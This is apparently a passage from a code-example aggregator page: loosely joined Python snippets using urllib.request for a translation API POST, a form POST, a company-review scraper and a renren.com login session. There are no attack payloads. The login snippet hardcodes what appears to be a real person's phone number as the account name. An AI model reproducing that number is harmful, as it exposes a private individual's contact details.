    'doctype': 'json',
    'version': '2.1',
    'keyfrom': 'fanyi.web',
    'action': 'FY_BY_REALTlME'
}
#转成Url编码
data = urllib.parse.urlencode(formdata).encode(encoding='utf-8')
#请求中有data参数为post请求,没有则是get请求
req = request.Request(url, data=data, headers=header)
response = request.urlopen(req).read().decode()
#提取"tgt":"和"}]]中间的任意内容
pat = r'"tgt":"(.*?)"}]]'
result = re.findall(pat, response)
print(result[0])
Пример #27
0
#!/usr/bin/python3
"""
a Python script that takes in a URL and an email,
sends a POST request to the passed URL with the email as a parameter,
and displays the body of the response
"""

if __name__ == '__main__':
    from sys import argv
    from urllib import request, parse
    value = {'email': argv[2]}
    data1 = parse.urlencode(value)
    data = data1.encode("utf-8")
    req = request.Request(argv[1], data)
    with request.urlopen(req) as response:
        content = response.read()
        print(content.decode("UTF-8"))
def scrapeCompanyReviews(url, fileName):

    # list of reviews
    text = []
    header = []
    job_title = []
    currentFormer = []
    location = []
    date = []
    stars = []

    # whether to go to next page of reviews
    bool = True
    # current index of review
    start = 0

    while (bool):

        # get HTML
        req = lib.Request(url + '?start=' + str(start),
                          headers={'User-Agent': 'Mozilla/5.0'})
        webpage = lib.urlopen(req)
        soup = BeautifulSoup(webpage, 'html.parser')

        # find reviews
        current_text = soup.find_all('span',
                                     attrs={
                                         'class': 'cmp-review-text',
                                         'itemprop': 'reviewBody'
                                     })
        current_header = soup.find_all('div',
                                       attrs={'class': 'cmp-review-title'})
        current_job_title = soup.find_all('span',
                                          attrs={'class': 'cmp-reviewer'})
        current_location = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-location'})
        if (len(current_location) != len(current_header)):
            if (len(current_header) == 21):
                start += 20
                continue
            else:
                bool = False
                continue
        current_date = soup.find_all(
            'span', attrs={'class': 'cmp-review-date-created'})
        current_stars1 = soup.find_all('span',
                                       attrs={'class': 'cmp-Rating-on'})
        if (len(current_stars1) == 127):
            continue
        current_stars2 = [
            current_stars1[i] for i in range(len(current_stars1)) if i % 6 == 1
        ][:-1]
        current_stars = [
            str(int(i['style'][7:-4]) / 20) for i in current_stars2
        ]
        current_currentFormer = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-title'})
        current_currentFormer = [
            re.search('\(([^)]+)', i.text).group(1)
            for i in current_currentFormer
        ]
        current_currentFormer = [
            int(i == 'Current Employee') for i in current_currentFormer
        ]

        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(len(current_stars1))
            print(len(current_stars2))
            print(current_stars)
            print(current_location)

        if (len(current_text) != 21):
            bool = False

        # if second or more page, remove first review
        if (start != 0 and len(current_text) != 0):
            current_text.pop(0)
            current_header.pop(0)
            current_job_title.pop(0)
            current_location.pop(0)
            current_date.pop(0)
            current_stars.pop(0)
            current_currentFormer.pop(0)

        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(current_stars)
            print(current_location)

        # index to next page
        start += 20

        # add text to list
        for i in current_text:
            text.append(i.text.strip().encode('ascii',
                                              errors='ignore').decode())

        # add headers to list
        for i in current_header:
            header.append(i.text.strip().encode('ascii',
                                                errors='ignore').decode())

        # add job titles to list
        for i in current_job_title:
            job_title.append(i.text.strip().encode('ascii',
                                                   errors='ignore').decode())

        # add locations to list
        for i in current_location:
            location.append(i.text.strip().encode('ascii',
                                                  errors='ignore').decode())

        # add dates to list
        for i in current_date:
            date.append(i.text.strip().encode('ascii',
                                              errors='ignore').decode())

        # add stars to list
        for i in current_stars:
            stars.append(i)

        # add stars to list
        for i in current_currentFormer:
            currentFormer.append(i)

    with open(fileName, 'a', newline='') as csv_file:
        writer = csv.writer(csv_file)
        writer.writerow([
            "company", "date", "job_title", "CurrentEmployee", "location",
            "header", "text", "stars"
        ])
        print(len(date), len(job_title), len(currentFormer), len(location),
              len(header), len(text), len(stars))
        for i, v in enumerate(text):
            writer.writerow([
                re.search('cmp/(.*)/', url).group(1), date[i], job_title[i],
                currentFormer[i], location[i], header[i], text[i], stars[i]
            ])
Пример #29
0
    def getRequest(self):

        return ur.Request(self.url_encoded,
                          data=self.data,
                          headers=self.header)
Пример #30
0
url = 'http://www.renren.com/PLogin.do'
form_data = {
    'email': '18518753265',
    'password': '******',
}
#首先要使用urlencode转换为url格式的编码,然后再转成b'(bytes)
form_data = parse.urlencode(form_data).encode('utf-8')
print(form_data)

#构造请求
headers = {
    'User-Agent':
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
#构建一个请求对象
req = request.Request(url, data=form_data, method="POST", headers=headers)

#发起请求
response = opener.open(req)
print(response.status)

# for cookie in cookieJar:
#     print(cookie.name,cookie.value)

url = 'http://www.renren.com/965722397/profile'
headers = {
    'User-Agent':
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
#构建一个请求对象
req = request.Request(url, headers=headers)